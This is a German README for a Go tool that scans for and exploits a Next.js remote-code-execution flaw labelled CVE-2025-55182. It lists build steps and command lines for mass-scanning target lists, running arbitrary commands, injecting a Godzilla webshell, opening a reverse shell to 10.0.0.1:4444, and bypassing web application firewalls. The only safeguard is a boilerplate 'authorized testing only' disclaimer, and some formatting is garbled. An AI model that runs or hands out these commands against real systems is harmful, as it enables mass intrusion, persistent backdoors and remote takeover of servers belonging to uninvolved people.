
Go-basierter Scanner und Exploitation-Tool für CVE-2025-55182 (Next.js RCE). Unterstützt Batch-Scanning, Befehlsausführung, Godzilla Memory Shell Injection, Reverse Shell und WAF-Bypass.
CVE-2025-55182 Schwachstellenscanner und Exploit-Tool für die Remote-Codeausführung in Next.js-Anwendungen. Unterstützt Massenscans, Befehlsausführung, Godzilla-Webshell-Injektion und Reverse-Shell-Funktionen.
⚠️ Dieses Tool ist nur für Sicherheitsforschung und autorisierte Tests bestimmt. Nicht für illegale Zwecke verwenden.
.txt-Dateien.success.json und optional Ausgabe der Schwachstellen-URLs in eine angegebene Datei.[
]
git clone https://github.com/luoqichen/CVE-2025-55182-POC.git
cd cve-2025-55182-POC
go build -o cve-2025-55182 main.go
./cve-2025-55182 -h
./cve-2025-55182 -u http://target.com:3000
./cve-2025-55182 -f targets.txt -t 20 -o vuln.txt
./cve-2025-55182 -u http://target.com:3000 -c "whoami"
./cve-2025-55182 -u http://target.com:3000 -g
Nach erfolgreicher Injektion gibt das Tool die Verbindungs-URL, das Passwort, den Schlüssel und die Header-Informationen für Godzilla aus.
./cve-2025-55182 -u http://target.com:3000 -rs 10.0.0.1:4444
./cve-2025-55182 -f targets.txt -p http://127.0.0.1:8080 -t 10
success.json: Speichert automatisch alle Details erfolgreich genutzter Ziele (einschließlich Befehlsausgabe, Godzilla-Konfiguration usw.).-o angegebene Datei: Speichert die Liste der Schwachstellen-URLs (eine pro Zeile).Während des Scans werden Fortschrittsbalken und gefundene Schwachstellen in Echtzeit angezeigt. Am Ende werden statistische Informationen ausgegeben.
-p.-to entsprechend erhöht werden.Dieses Tool dient ausschließlich der Sicherheitsforschung und autorisierten Tests. Der Benutzer trägt die alleinige rechtliche Verantwortung. Der Entwickler haftet nicht für Missbrauch.
| Parameter | Typ | Standardwert | Beschreibung |
|---|
-u | string | Kein | Einzelne Ziel-URL (z.B. http://example.com:3000) |
-f | string | Kein | Datei mit URL-Liste (eine URL pro Zeile) |
-d | string | Kein | Ordner mit mehreren .txt-Dateien |
-o | string | Kein | Ausgabedatei (speichert Schwachstellen-URLs, eine pro Zeile) |
-t | int | 10 | Anzahl der gleichzeitigen Threads |
-to | int | 10 | Anfrage-Timeout (Sekunden) |
-c | string | Kein | Auszuführender Befehl (z.B. id) |
-m | string | Kein | Modus: waf (aktiviert WAF-Bypass) |
-p | string | Kein | HTTP-Proxy (z.B. http://127.0.0.1:8080) |
-g | bool | false | Godzilla-Webshell-Injektion aktivieren |
-rs | string | Kein | Reverse-Shell-Adresse (Format IP:PORT) |
-dv | bool | false | Ausführlicher Modus (druckt Scanvorgang für jede URL) |
-es | bool | false | Scannen auf sensible Informationen |